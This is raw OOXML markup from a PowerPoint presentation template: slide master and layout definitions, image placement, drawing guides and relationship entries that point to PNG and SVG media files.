              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" xmlns="" r:embed="rId81"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16789385" y="0"/>
            <a:ext cx="1498615" cy="277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9559FA-E099-49BC-7176-16E3F5714B8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hdr"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17445038" y="63500"/>
            <a:ext cx="80803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8DC63F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PARTNERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370298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67" r:id="rId2"/>
    <p:sldLayoutId id="2147483894" r:id="rId3"/>
    <p:sldLayoutId id="2147483896" r:id="rId4"/>
    <p:sldLayoutId id="2147483895" r:id="rId5"/>
    <p:sldLayoutId id="2147483874" r:id="rId6"/>
    <p:sldLayoutId id="2147483903" r:id="rId7"/>
    <p:sldLayoutId id="2147483887" r:id="rId8"/>
    <p:sldLayoutId id="2147483876" r:id="rId9"/>
    <p:sldLayoutId id="2147483958" r:id="rId10"/>
    <p:sldLayoutId id="2147483930" r:id="rId11"/>
    <p:sldLayoutId id="2147483959" r:id="rId12"/>
    <p:sldLayoutId id="2147483877" r:id="rId13"/>
    <p:sldLayoutId id="2147483950" r:id="rId14"/>
    <p:sldLayoutId id="2147483878" r:id="rId15"/>
    <p:sldLayoutId id="2147483951" r:id="rId16"/>
    <p:sldLayoutId id="2147483936" r:id="rId17"/>
    <p:sldLayoutId id="2147483937" r:id="rId18"/>
    <p:sldLayoutId id="2147483944" r:id="rId19"/>
    <p:sldLayoutId id="2147483904" r:id="rId20"/>
    <p:sldLayoutId id="2147483952" r:id="rId21"/>
    <p:sldLayoutId id="2147483905" r:id="rId22"/>
    <p:sldLayoutId id="2147483953" r:id="rId23"/>
    <p:sldLayoutId id="2147483916" r:id="rId24"/>
    <p:sldLayoutId id="2147483917" r:id="rId25"/>
    <p:sldLayoutId id="2147483912" r:id="rId26"/>
    <p:sldLayoutId id="2147483913" r:id="rId27"/>
    <p:sldLayoutId id="2147483914" r:id="rId28"/>
    <p:sldLayoutId id="2147483954" r:id="rId29"/>
    <p:sldLayoutId id="2147483915" r:id="rId30"/>
    <p:sldLayoutId id="2147483955" r:id="rId31"/>
    <p:sldLayoutId id="2147483938" r:id="rId32"/>
    <p:sldLayoutId id="2147483939" r:id="rId33"/>
    <p:sldLayoutId id="2147483940" r:id="rId34"/>
    <p:sldLayoutId id="2147483941" r:id="rId35"/>
    <p:sldLayoutId id="2147483888" r:id="rId36"/>
    <p:sldLayoutId id="2147483948" r:id="rId37"/>
    <p:sldLayoutId id="2147483889" r:id="rId38"/>
    <p:sldLayoutId id="2147483949" r:id="rId39"/>
    <p:sldLayoutId id="2147483925" r:id="rId40"/>
    <p:sldLayoutId id="2147483926" r:id="rId41"/>
    <p:sldLayoutId id="2147483875" r:id="rId42"/>
    <p:sldLayoutId id="2147483897" r:id="rId43"/>
    <p:sldLayoutId id="2147483891" r:id="rId44"/>
    <p:sldLayoutId id="2147483960" r:id="rId45"/>
    <p:sldLayoutId id="2147483906" r:id="rId46"/>
    <p:sldLayoutId id="2147483961" r:id="rId47"/>
    <p:sldLayoutId id="2147483892" r:id="rId48"/>
    <p:sldLayoutId id="2147483956" r:id="rId49"/>
    <p:sldLayoutId id="2147483933" r:id="rId50"/>
    <p:sldLayoutId id="2147483962" r:id="rId51"/>
    <p:sldLayoutId id="2147483931" r:id="rId52"/>
    <p:sldLayoutId id="2147483932" r:id="rId53"/>
    <p:sldLayoutId id="2147483963" r:id="rId54"/>
    <p:sldLayoutId id="2147483945" r:id="rId55"/>
    <p:sldLayoutId id="2147483964" r:id="rId56"/>
    <p:sldLayoutId id="2147483942" r:id="rId57"/>
    <p:sldLayoutId id="2147483965" r:id="rId58"/>
    <p:sldLayoutId id="2147483946" r:id="rId59"/>
    <p:sldLayoutId id="2147483966" r:id="rId60"/>
    <p:sldLayoutId id="2147483908" r:id="rId61"/>
    <p:sldLayoutId id="2147483929" r:id="rId62"/>
    <p:sldLayoutId id="2147483934" r:id="rId63"/>
    <p:sldLayoutId id="2147483928" r:id="rId64"/>
    <p:sldLayoutId id="2147483907" r:id="rId65"/>
    <p:sldLayoutId id="2147483902" r:id="rId66"/>
    <p:sldLayoutId id="2147483901" r:id="rId67"/>
    <p:sldLayoutId id="2147483909" r:id="rId68"/>
    <p:sldLayoutId id="2147483910" r:id="rId69"/>
    <p:sldLayoutId id="2147483911" r:id="rId70"/>
    <p:sldLayoutId id="2147483873" r:id="rId71"/>
    <p:sldLayoutId id="2147483957" r:id="rId72"/>
    <p:sldLayoutId id="2147483890" r:id="rId73"/>
    <p:sldLayoutId id="2147483927" r:id="rId74"/>
    <p:sldLayoutId id="2147483899" r:id="rId75"/>
    <p:sldLayoutId id="2147483898" r:id="rId76"/>
    <p:sldLayoutId id="2147483900" r:id="rId77"/>
    <p:sldLayoutId id="2147483947" r:id="rId78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orient="horz" pos="552" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="5928" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="1096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91810E21-14A6-E1CF-E2BB-1B3CA6E89B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId88">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" xmlns="" r:embed="rId89"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16789386" y="-1"/>
            <a:ext cx="1498614" cy="277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5565F9-C440-55C0-D822-FEB57413B33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hdr"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17445038" y="63500"/>
            <a:ext cx="80803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8DC63F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PARTNERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14382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  <p:sldLayoutId id="2147483980" r:id="rId12"/>
    <p:sldLayoutId id="2147483981" r:id="rId13"/>
    <p:sldLayoutId id="2147483982" r:id="rId14"/>
    <p:sldLayoutId id="2147483983" r:id="rId15"/>
    <p:sldLayoutId id="2147483984" r:id="rId16"/>
    <p:sldLayoutId id="2147483985" r:id="rId17"/>
    <p:sldLayoutId id="2147483986" r:id="rId18"/>
    <p:sldLayoutId id="2147483987" r:id="rId19"/>
    <p:sldLayoutId id="2147483988" r:id="rId20"/>
    <p:sldLayoutId id="2147483989" r:id="rId21"/>
    <p:sldLayoutId id="2147483990" r:id="rId22"/>
    <p:sldLayoutId id="2147483991" r:id="rId23"/>
    <p:sldLayoutId id="2147483992" r:id="rId24"/>
    <p:sldLayoutId id="2147483993" r:id="rId25"/>
    <p:sldLayoutId id="2147483994" r:id="rId26"/>
    <p:sldLayoutId id="2147483995" r:id="rId27"/>
    <p:sldLayoutId id="2147483996" r:id="rId28"/>
    <p:sldLayoutId id="2147483997" r:id="rId29"/>
    <p:sldLayoutId id="2147483998" r:id="rId30"/>
    <p:sldLayoutId id="2147483999" r:id="rId31"/>
    <p:sldLayoutId id="2147484000" r:id="rId32"/>
    <p:sldLayoutId id="2147484001" r:id="rId33"/>
    <p:sldLayoutId id="2147484002" r:id="rId34"/>
    <p:sldLayoutId id="2147484003" r:id="rId35"/>
    <p:sldLayoutId id="2147484004" r:id="rId36"/>
    <p:sldLayoutId id="2147484005" r:id="rId37"/>
    <p:sldLayoutId id="2147484006" r:id="rId38"/>
    <p:sldLayoutId id="2147484007" r:id="rId39"/>
    <p:sldLayoutId id="2147484008" r:id="rId40"/>
    <p:sldLayoutId id="2147484009" r:id="rId41"/>
    <p:sldLayoutId id="2147484010" r:id="rId42"/>
    <p:sldLayoutId id="2147484011" r:id="rId43"/>
    <p:sldLayoutId id="2147484012" r:id="rId44"/>
    <p:sldLayoutId id="2147484013" r:id="rId45"/>
    <p:sldLayoutId id="2147484014" r:id="rId46"/>
    <p:sldLayoutId id="2147484015" r:id="rId47"/>
    <p:sldLayoutId id="2147484016" r:id="rId48"/>
    <p:sldLayoutId id="2147484017" r:id="rId49"/>
    <p:sldLayoutId id="2147484018" r:id="rId50"/>
    <p:sldLayoutId id="2147484019" r:id="rId51"/>
    <p:sldLayoutId id="2147484020" r:id="rId52"/>
    <p:sldLayoutId id="2147484021" r:id="rId53"/>
    <p:sldLayoutId id="2147484022" r:id="rId54"/>
    <p:sldLayoutId id="2147484023" r:id="rId55"/>
    <p:sldLayoutId id="2147484024" r:id="rId56"/>
    <p:sldLayoutId id="2147484025" r:id="rId57"/>
    <p:sldLayoutId id="2147484026" r:id="rId58"/>
    <p:sldLayoutId id="2147484027" r:id="rId59"/>
    <p:sldLayoutId id="2147484028" r:id="rId60"/>
    <p:sldLayoutId id="2147484029" r:id="rId61"/>
    <p:sldLayoutId id="2147484030" r:id="rId62"/>
    <p:sldLayoutId id="2147484031" r:id="rId63"/>
    <p:sldLayoutId id="2147484032" r:id="rId64"/>
    <p:sldLayoutId id="2147484033" r:id="rId65"/>
    <p:sldLayoutId id="2147484034" r:id="rId66"/>
    <p:sldLayoutId id="2147484035" r:id="rId67"/>
    <p:sldLayoutId id="2147484036" r:id="rId68"/>
    <p:sldLayoutId id="2147484037" r:id="rId69"/>
    <p:sldLayoutId id="2147484038" r:id="rId70"/>
    <p:sldLayoutId id="2147484039" r:id="rId71"/>
    <p:sldLayoutId id="2147484040" r:id="rId72"/>
    <p:sldLayoutId id="2147484041" r:id="rId73"/>
    <p:sldLayoutId id="2147484042" r:id="rId74"/>
    <p:sldLayoutId id="2147484043" r:id="rId75"/>
    <p:sldLayoutId id="2147484044" r:id="rId76"/>
    <p:sldLayoutId id="2147484045" r:id="rId77"/>
    <p:sldLayoutId id="2147484046" r:id="rId78"/>
    <p:sldLayoutId id="2147484047" r:id="rId79"/>
    <p:sldLayoutId id="2147484048" r:id="rId80"/>
    <p:sldLayoutId id="2147484049" r:id="rId81"/>
    <p:sldLayoutId id="2147484050" r:id="rId82"/>
    <p:sldLayoutId id="2147484051" r:id="rId83"/>
    <p:sldLayoutId id="2147484052" r:id="rId84"/>
    <p:sldLayoutId id="2147484053" r:id="rId85"/>
    <p:sldLayoutId id="2147484054" r:id="rId86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>
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="5760">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="552">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="552">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="5928">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="1096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tx1"/>
            </a:gs>
            <a:gs pos="88000">
              <a:schemeClr val="tx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00A01C5-FB92-A043-B688-451B57D48D87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027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  <p:sldLayoutId id="2147484068" r:id="rId13"/>
    <p:sldLayoutId id="2147484069" r:id="rId14"/>
    <p:sldLayoutId id="2147484070" r:id="rId15"/>
    <p:sldLayoutId id="2147484071" r:id="rId16"/>
    <p:sldLayoutId id="2147484072" r:id="rId17"/>
    <p:sldLayoutId id="2147484073" r:id="rId18"/>
    <p:sldLayoutId id="2147484074" r:id="rId19"/>
    <p:sldLayoutId id="2147484075" r:id="rId20"/>
    <p:sldLayoutId id="2147484076" r:id="rId21"/>
    <p:sldLayoutId id="2147484077" r:id="rId22"/>
    <p:sldLayoutId id="2147484078" r:id="rId23"/>
    <p:sldLayoutId id="2147484079" r:id="rId24"/>
    <p:sldLayoutId id="2147484080" r:id="rId25"/>
    <p:sldLayoutId id="2147484081" r:id="rId26"/>
    <p:sldLayoutId id="2147484082" r:id="rId27"/>
    <p:sldLayoutId id="2147484083" r:id="rId28"/>
    <p:sldLayoutId id="2147484084" r:id="rId29"/>
    <p:sldLayoutId id="2147484085" r:id="rId30"/>
    <p:sldLayoutId id="2147484086" r:id="rId31"/>
    <p:sldLayoutId id="2147484087" r:id="rId32"/>
    <p:sldLayoutId id="2147484088" r:id="rId33"/>
    <p:sldLayoutId id="2147484089" r:id="rId34"/>
    <p:sldLayoutId id="2147484090" r:id="rId35"/>
    <p:sldLayoutId id="2147484091" r:id="rId36"/>
    <p:sldLayoutId id="2147484092" r:id="rId37"/>
  </p:sldLayoutIdLst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5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indent="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408">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="5352">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="418">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="282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62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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62.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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3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70.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67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svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62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34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87.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png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72.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.svg"/><Relationship Id="rId14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2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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91.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png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73.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.svg"/><Relationship Id="rId1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91.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png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73.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.svg"/><Relationship Id="rId1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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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94.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.svg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77.sv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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.svg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91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91.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79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73.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.svg"/><Relationship Id="rId1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91.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.svg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79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73.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.svg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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91.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.svg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png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73.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.svg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102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91.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.svg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.svg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73.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 